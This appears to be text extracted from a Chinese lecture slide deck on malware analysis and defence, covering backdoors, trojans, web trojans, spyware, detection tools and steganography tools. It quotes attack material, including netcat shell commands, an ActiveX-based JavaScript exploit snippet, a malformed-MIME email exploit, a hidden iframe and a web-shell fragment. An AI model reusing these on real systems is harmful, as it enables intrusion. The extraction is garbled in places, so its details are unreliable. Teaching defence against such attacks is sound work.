恶意软件病毒的分析与防范Defenceampanalysisofmalware.ppt

恶意软件病毒的分析与防范Defenceampanalysisofmalware Still waters run deep.流静水深流静水深,人静心深人静心深 Where there is life,there is hope。有生命必有希望。有生命必有希望后门后门是一个允许攻击者绕过系统中常规安全控制机制的程序，他按照攻击者自己的意图提供通道。后门的重点在于为攻击者提供进入目标计算机的通道。2后门的类型本地权限的提升对系统有访问权的攻击者变换其权限等级成为管理员，然后攻击者可以重新设置该系统或访问人和存储在系统中的文件。单个命令的远程执行攻击者可以向目标计算机发送消息。每次执行一个单独的命令，后门执行攻击者的命令并将输出返回给攻击者。远程命令行解释器访问正如远程Shell，这类后门允许攻击者通过网络快速直接地键入受害计算机的命令提示。其比“单个命令的远程执行”要强大得多。远程控制GUI攻击者可以看到目标计算机的GUI，控制鼠标的移动，输入对键盘的操作，这些都通过网络实现。3后门的安装自己植入（物理接触或入侵之后）通过病毒、蠕虫和恶意移动代码欺骗受害者自己安装Email远程共享BT下载4后门举例NetCat：通用的网络连接工具用法一：nc l p 5000 e cmd.exe nc 127.0.0.1 5000用法二：nc l p 5000nc 127.0.0.1 5000 e cmd.execshell.exe5其他Windows下的后门程序CryptCatTini提供通向Tcp端口7777，只有3K。67无端口后门-如何唤醒ICMP后门不使用TCP/UDP协议。使用ICMP协议进行通信。难以检测。非混合型探测后门攻击者将触发指令发送到对方计算机。难以检测。(Cd00r:syn to port x,syn to port y,syn to port z)混合型探测后门只要攻击者将触发指令发送到对方网络中即可触发后门。更加难以检测。(syn to port x,syn to port x,syn to port x in different Ips)8Bits-glacier进程管理器中看不到平时没有端口，只是在系统中充当卧底的角色提供正向连接和反向连接两种功能仅适用于Windows2000/XP/2003具体用法和例子可以查看“难难以以觉觉察察的的后后门门-BITSBITS”一文9GUI(Graphics User Interface)远程控制并非所有的GUI远程控制都是恶意的VNC(Virtual Network Computing)Windows Terminal ServicesPCAnywhereBack Orifice 2000SubSeven10VNC英国剑桥大学AT&T实验室在2002年开发的轻量型的远程控制计算机软件，任何人都可免费取得该软件。VNC软件主要由两个部分组成：VNC server及VNC viewer。VNC server 与 VNC viewer 支持多种操作系统，如 windows，Linux，MacOS 及 Unix 系列（Unix，Solaris等），因此可将 VNC server 及 VNC viewer 分别安装在不同的操作系统中进行控制。也可以通过一般的网络浏览器（如 IE 等）来控制被控端（需要 Java 虚拟机的支持）。11VNC程程序序举举例例12后门的启动感染普通执行文件或系统文件添加程序到“开始”-“程序”-“启动”选项 修改系统配置文件win.ini、system.ini、wininit.ini、winstart.bat、autoexec.bat等的相关启动选项 通过修改注册表启动键值 修改文件关联的打开方式 添加计划任务 利用自定义文件夹风格 注册为InternetExplorer的BHO(BrowserHelperObject)组件 具体请参考“Windows的自启动方式”一文。13检测Windows后门启动技术手工检测注册表启动键值启动选项关联方式计划任务利用工具检测MsconfigAutoRunshttp:/ LANguard System Integrity Monitor,Ionx Data Sentinel）14AutoRuns的运行界面15如何防御后门 -普通后门培养良好的安全意识和习惯。使用网络防火墙封锁与端口的连接。仅允许最少数量的端口通信通过防火墙天网个人防火墙，瑞星防火墙，江民黑客防火墙，Zone Alarm，Norton Personal Firewall经常利用端口扫描器扫描主机或端口查看工具查找本地端口监听程序。Nmap，Xscan，NC，Fport，TcpView，IceSword16如何防御后门 -无端口后门查找不寻常的程序查找不寻常的进程利用基于网络的IDS查找隐蔽的后门命令，如Snort。检测本地和网络中的混杂模式的网卡本地检测嗅探器（Promiscdetect.exe）远程检测嗅探器（Sentinel,AntiSniff）172.特洛伊木马特洛伊木马是一个程序，他看起来具有某个有用的或善意的目的，但是实际上掩盖着一些隐藏的恶意功能。欺骗用户或者系统管理员安装在计算机上与“正常”的程序一起混合运行，将自己伪装得看起来属于该系统。18后门 VS 特洛伊木马如果一个程序仅仅提供远程访问，那么它只是一个后门。如果攻击者将这些后门功能伪装成某些其他良性程序，那么就涉及到真正的特洛伊木马。19特洛伊木马木马系统软件一般由木马配置程序、控制端程序和木马程序(服务器程序)等三部分组成。木马程序，也称服务器程序，它驻留在受害者的系统中，非法获取其操作权限，负责接收控制端指令，并根据指令或配置发送数据给控制端。木马配置程序设置木马程序的端口号、触发条件、木马名称等，使其在服务端藏得更隐蔽，有时该配置功能被集成在控制端程序菜单内，不单独作为一个程序。控制端程序控制远程服务器，有些程序集成了木马配置的功能。20212.1名字欺骗修改文件的文件名以欺骗用户与Windows扩展名放在一起Beauty.jpg .exe模仿其他文件名httpd,iexplore,notepad,ups,svchost不能用“任务管理器”删除的进程名Csrss.exe,services.exe,smss.exe,winlogon.exe,system,system idle process路径威胁如将木马命名为explorer.exe放在C:下。22对命名陷阱的防御确定指定进程属于哪个程序Fport,icesword,tcpview使用杀进程工具进行查杀Pskill,icesword232.2 文件捆绑恶意程序与正常程序捆绑捆绑工具EXE捆绑机,Wrappers,binders,EXE bindersCHM,Flash.压缩软件（winrar）WinRMSetup30.exe防御使用反病毒软件进行检测，并及时更新病毒库。242.3软件下载从网上下载的软件是你真正需要的软件吗？从网上下载的软件是否被恶意修改过？防御措施用户注意完整性检测（如MD5,FileChecker）小心测试新软件252.4 软件本身带毒内部员工注入恶意代码软件开发的全球化趋势多个部门联合开发软件，一层层的外包262.5 Html传播网页病毒的传播方式Flash传播网页email传播网页Chm 传播网页木马Exe2bmp正常网页中携带27网页病毒的传播方式 1-美丽的网页名称，以及利用浏览者的无知.URL1:http:/ 32email传播网页33Chm 传播网页木马x.htm：or Easy CHM or Quick chm 把x.htm和x.exe生成x.chm 34exe2bmpexe2bmp可以将一个.exe可执行文件生成同名的.bmp、.asp、.htm三个文件。将这三个文件放到支持ASP的空间里边，当别人打开.htm网页文件的时候，先前的.exe木马将被自动下载到对方的硬盘并运行。For examplex.exe produce:x.bmp;x.asp;x.htm35x.htm数据装载中，可能需要10秒至30秒.36x.asp1-在cache中寻找1.bmp2-把bmp还原为exe3-执行exe37正常网页中携带Window.openOnload,onerror38网页病毒、网页木马的原理 Javascript.Exception.Exploit：JS+WSH 错误的MIMEMultipurposeInternetMailExtentions，多用途的网际邮件扩充协议头.IE5.0到IE6.0 EXEto.BMP+Javascritp.Exception.Exploit iframe漏洞的利用：父窗口能在子域环境下运行脚本代码，包括任意的恶意代码 通过安全认证的CAB,COX EXE文件的捆绑 39Javascript.Exception.Exploit Function destroy()try a1=document.applets0;a1.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B);a1.createInstance();Shl=a1.GetObject();a1.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228);a1.createInstance();FSO=a1.GetObject();a1.setCLSID(F935DC26-1CF0-11D0-ADB9-00C04FD58A0B);a1.createInstance();Net=a1.GetObject();try do something;catch(e)catch(e)function do()setTimeout(destroy(),1000);/设定运行时间1秒do()/坏事执行函数指令40错误的MIMEMultipurposeInternetMailExtentions Content-Type:multipart/related;type=multipart/alternative“;boundary=”=B=“-=B=Content-Type:multipart/alternative;boundary=”=A=“-=A=Content-Type:text/html;Content-Transfer-Encoding:quoted-printable-=A=-=B=Content-Type:audio/x-wav;name=”run.exe“-可以改为其他脚本文件Content-Transfer-Encoding:base64Content-ID:-以下省略AAAAAN+1个-当申明邮件的类型为audio/x-wav时，IE存在的一个漏洞会将附件认为是音频文件自动尝试打开 41iframeiframesrc=run.emlwidth=0height=0/iframe 42Startup.htmlstartupdocument.getElementById(clientcall).click()43HTA的全名为HTMLApplication 参见x.asp44各种溢出型漏洞iframe溢出 Javaprxy.DLL COM对象堆溢出漏洞 http:/ 45木马的发展加入Rootkit,隐藏文件/端口/服务/进程等HTTP隧道HyDan(把信息隐藏在二进制文件中)46%If(cmd )Then%&szTempFile,0,True)%FORM action=method=POSTinput type=text name=.CMD size=45 value=47木马检测工具安天实验室：木马防线http:/功能介绍48木马防线2005+49木马克星木马克星可以查杀8122种国际木马,1053种密码偷窃木马,保证查杀传奇密码偷窃木马,灰鸽子API反杀病毒软件类木马,冰河类文件关联木马,密码解霸,奇迹射手等游戏密码邮寄木马,内置木马防火墙,任何黑客程序试图发送密码邮件,都需要Iparmor 确认,不仅可以查杀木马,更可以反查黑客密码。50间谍软件他们以主动收集用户个人信息、相关机密文件或隐私数据为主，搜集到的数据会主动传送到指定服务器。51间谍软件发展之初，多被一些在线广告商以及Kazaa等音乐交换网站使用，这些公司将一些监控程序放在用户电脑内监视其网上行为、收集其兴趣爱好，或者在空闲时间进行其它操作。这些公司以让用户上网免费赚钱或免费获得音乐为幌子，吸引了众多用户下载，而这些软件中所带的间谍程序便悄悄地收集用户信息，然后根据这些信息发送广告，或者把这些收集的信息转卖给其他广告公司获取利益。52间谍软件的传播方式软件捆绑和嵌套浏览网站（恶意网页或网页木马）邮件发送利用漏洞进行主动传播和植入（多隐身于蠕虫之中）。53部分间谍和广告软件CoolWebSearch：可能是最下流也最恶毒的程序之一。它完全劫持了IE浏览器，害你什么事都做不成。PurityScan，一个显示弹出广告，声称可以发现并删除个人电脑上的色情内容的程序。Transponder(vx2)，一个IE“浏览器助手”，它能够监控网络浏览并发送相关广告。KeenValue是一个广告程序，它收集个人信息并向计算机用户发送广告。Perfect Keylogger一个记录所访问过的站点、击键的记录和鼠标的移动的工具。它记录下用户的口令和账户等信息。54ContinueHotBar(BHO)A better Internet55发展趋势逐渐融合了各种病毒、蠕虫、木马、甚至Rootkit的技术和特点，无处不在，危害特别巨大。其会变得越来越普遍，越来越复杂。功能越来越就有针对性和目的性。自我隐藏技术则会越来越先进。这将给间谍软件的检测带来巨大挑战。56间谍软件检测工具1.Spybot Search and Destroy(简称：SpyBot S&D)：能扫描你的硬盘，然后找出你硬盘里面的广告和间谍程序，然后把这些会对你的电脑产生危害的程序移除，支持常用的所有浏览器。2.Spy Sweeper：让你免受间谍软件的影响，它能在你浏览网页，浏览邮件，下载软件的时候给予你充足的保护，免受间谍软件的入侵，保护个人的信息。57间谍软件检测工具3.Spyware Doctor：是一个先进的间谍软件、广告软件公用程序，它可以检查并从你的电脑移走间谍软件、广告软件、木马程序、键盘记录器和追踪威胁。4.SpyRemover：专门为清除悄悄安装在你的电脑里的间谍程序而设计的一个计算机网络安全工具。它可以帮助你快速的在系统组件中搜索已知的间谍程序的踪迹，并可以帮助你安全的清除他们。全面保护你的网络安全。支持多国语言。58间谍软件检测工具5.微软：AntiSpyware。6.McAfee企业版反间谍软件。其可有效侦测及降低遭受间谍程序(spyware)、广告软件(adware)、色情拨号程序(dialers)、键盘记录软件(keyloggers)、cookies文件和远程控制程序等潜在恶意程序(PUPs)的袭击。59Question？60Hide information in a fileBlindside(Freeware)-Uses BMP carrier files and includes encryption.BMP Secrets(Freeware)-Uses BMP carrier files and includes encryption.Cameleon(Freeware)-French language tool that uses GIF carrier files and includes encryption.Camera/Shy v0.2.23.1(Freeware)-Scans for and delivers decrypted content from the Internet.Camouflage(Freeware)-Can hide information in any digital file type by inserting it after the end of file marker.Information hidden this way will not affect how the carrier looks or behaves,although it will increase file size.Includes password protection.Contraband Hell Edition(Freeware)-Uses BMP carrier files and includes encryption.Courier v1.0a(Freeware)-Uses BMP carrier files.CryptArkan(Shareware)-Uses WAV and BMP carrier files;hidden data can be directly read off an audio CD.Includes encryption.Data Privacy Tools(Freeware)Uses BMP carrier files and includes encryption.61Hide information in a fileData Stash(Shareware)-Uses BMP and database carrier files and includes password protection.Digital Picture Envelope v1.0(Freeware)-Uses BMP carrier files.Encrypt Pic(Shareware)-Uses 24-bit BMP carrier files and includes encryption.Gif-it-Up(Freeware)-Uses GIF carrier files and includes encryption.Gifshuffle v2.0(Freeware)-A command-line tool that uses GIF carrier files and includes encryption.Hermetic Stego(Shareware)-Uses BMP carrier files.The developers claim their stego key makes the payload undetectable.Hide and Seek for Win95(Shareware)-Uses BMP carrier files and includes encryption and file wiping.Hide4PGP v2.0(Freeware)-A command-line tool that uses BMP,WAV,and VOC carrier files.Hide In Picture 2.0(Freeware)-USes BMP carrier files and includes encryption.ImageHide(Freeware)-Uses a variety of image carrier files.In Plain View(Freeware)-Uses BMP carrier files and includes password protection.In The Picture(Shareware)-Uses BMP carrier files and includes encryption.62InfoStego(Freeware)-Uses BMP carrier files;includes encryption.Invisible Secrets v4.0(Shareware)-Uses JPEG,PNG,BMP,HTML and WAV carrier files.Includes encryption,shredder,password manager and self-decrypting archives.JPegX(Freeware)-Uses JPEG carrier files and includes encryption and password protection.JP Hide and Seek(Freeware)-Uses JPEG carrier files and includes encryption.JSteg Shell v2.0(Freeware)-Uses JPEG carrier files;includes encryption.MP3Stego(Freeware)-Uses MP3 carrier files.PGPn123(Freeware)-A tool that facilitates using PGP for Eudora,Agent,or Pegasus Mail and also includes a steganography option.PhotoCrypt 1.1(Freeware)-Uses BMP carrier files.Sams Big Play Maker(Freeware)-A text generation tool that converts a message into an output that looks like a play.Scramdisk(Freeware)-A disk encryption program that allows the creation and use of virtual encrypted drives.Scytale 32bit(Freeware)-A PGP shell program that uses PCX carrier files.SecurEngine 4.0(Freeware)-Uses BMP,JPEG,WAV,and txt files as carrier files.Includes encryption,file wiping,a password manager,and self-decrypting archives.Stash-It v1.1(Freeware)-Uses BMP,GIF,TIFF,PNG or PCX carrier files.Steghide 0.4.6b(Freeware)-Uses BMP,WAV and AU carrier files.Includes encryption.Stego-Lame(Freeware)-Uses various audio formats as carrier files.Written in Windows C source code;must be compiled before use.S-Tools 4-(Freeware)-Uses BMP,GIF,and WAV carrier files;includes password and encryption options.The Third Eye(Freeware)-Uses BMP,GIF,and PCX carrier files and includes encryption wbStego4.3open(Freeware)-Uses BMP,TXT,HTML/XML,and PDF carrier files for both Windows and Unix.Includes a Wizard interface,encryption,and passphrase support.WeavWav(Freeware)-Uses WAV carrier files63